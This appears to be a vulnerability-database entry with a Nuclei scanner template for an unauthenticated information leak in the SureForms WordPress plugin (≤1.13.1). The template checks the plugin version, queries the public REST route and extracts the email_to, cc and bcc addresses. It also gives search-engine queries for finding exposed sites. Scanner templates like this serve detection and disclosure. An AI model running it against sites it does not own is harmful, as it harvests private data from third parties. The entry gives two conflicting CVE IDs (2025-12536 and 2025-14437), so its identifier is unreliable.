SureForms <= 1.13.1 - Sensitive Information Exposure
CVE-2025-12536
Verified
Description
SureForms WordPress plugin <= 1.13.1 contains a sensitive information exposure caused by setting 'auth_callback' to '__return_true' in '_srfm_email_notification' post meta registration, letting unauthenticated attackers access sensitive email notification data, exploit requires no authentication.
Severity
Medium
CVSS Score
5.3
Exploit Probability
1%
Affected Product
sureforms
Published Date
April 6, 2026
Template Author
pussycat0x
CVE-2025-12536.yaml
id: CVE-2025-12536
info:
name: SureForms <= 1.13.1 - Sensitive Information Exposure
author: pussycat0x
severity: medium
description: |
SureForms WordPress plugin <= 1.13.1 contains a sensitive information exposure caused by setting 'auth_callback' to '__return_true' in '_srfm_email_notification' post meta registration, letting unauthenticated attackers access sensitive email notification data, exploit requires no authentication.
impact: |
Unauthenticated attackers can access sensitive email notification configurations, potentially leading to data leakage and abuse of downstream systems.
remediation: |
Update to the latest version beyond 1.13.1.
reference:
- https://patchstack.com/database/wordpress/plugin/sureforms/vulnerability/wordpress-sureforms-plugin-1-13-1-unauthenticated-sensitive-information-exposure-vulnerability
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sureforms/sureforms-1131-missing-authorization-to-unauthenticated-sensitive-information-exposure
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2025-14437
epss-score: 0.00639
epss-percentile: 0.70767
cwe-id: CWE-862
metadata:
verified: true
max-request: 3
vendor: brainstormforce
product: sureforms
framework: wordpress
shodan-query: 'http.html:"/wp-content/plugins/sureforms/"'
fofa-query: body="/wp-content/plugins/sureforms/"
publicwww-query: "/wp-content/plugins/sureforms/"
tags: cve,cve2025,wordpress,wp-plugin,sureforms,exposure,wp,
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/sureforms/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "SureForms")'
- compare_versions(version, '<= 1.13.1')
condition: and
internal: true
extractors:
- type: regex
part: body
name: version
group: 1
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
internal: true
- raw:
- |
GET /{{route}} HTTP/1.1
Host: {{Hostname}}
attack: clusterbomb
payloads:
route:
- "wp-json/wp/v2/sureforms_form"
- "?rest_route=/wp/v2/sureforms_form"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: content_type
words:
- "application/json"
- type: word
part: body
words:
- "_srfm_email_notification"
- "sureforms_form"
condition: and
- type: word
part: body
words:
- "email_to"
- "email_cc"
- "email_bcc"
condition: or
- type: status
status:
- 200
extractors:
- type: regex
name: email_to
part: body
group: 1
regex:
- '"email_to"\s*:\s*"([^"]+)"'
- type: regex
name: email_cc
part: body
group: 1
regex:
- '"email_cc"\s*:\s*"([^"]+)"'
- type: regex
name: email_bcc
part: body
group: 1
regex:
- '"email_bcc"\s*:\s*"([^"]+)"'
# digest: 4a0a0047304502205c502bb4b93fe270ff144e4b6dbad982be32bbe5c6a863c0bd823dfaa0600df0022100d533e057e73cfb4171bc3e71b27ef0de03064377a8afcc0bce506f065c5d41e0:922c64590222798bb761d5b6d8e729505.3Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVE ID:
cve-2025-14437
CWE ID:
cwe-862
References
https://patchstack.com/database/wordpress/plugin/sureforms/vulnerability/wordpress-sureforms-plugin-1-13-1-unauthenticated-sensitive-information-exposure-vulnerabilityhttps://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sureforms/sureforms-1131-missing-authorization-to-unauthenticated-sensitive-information-exposure
Remediation Steps
Update to the latest version beyond 1.13.1.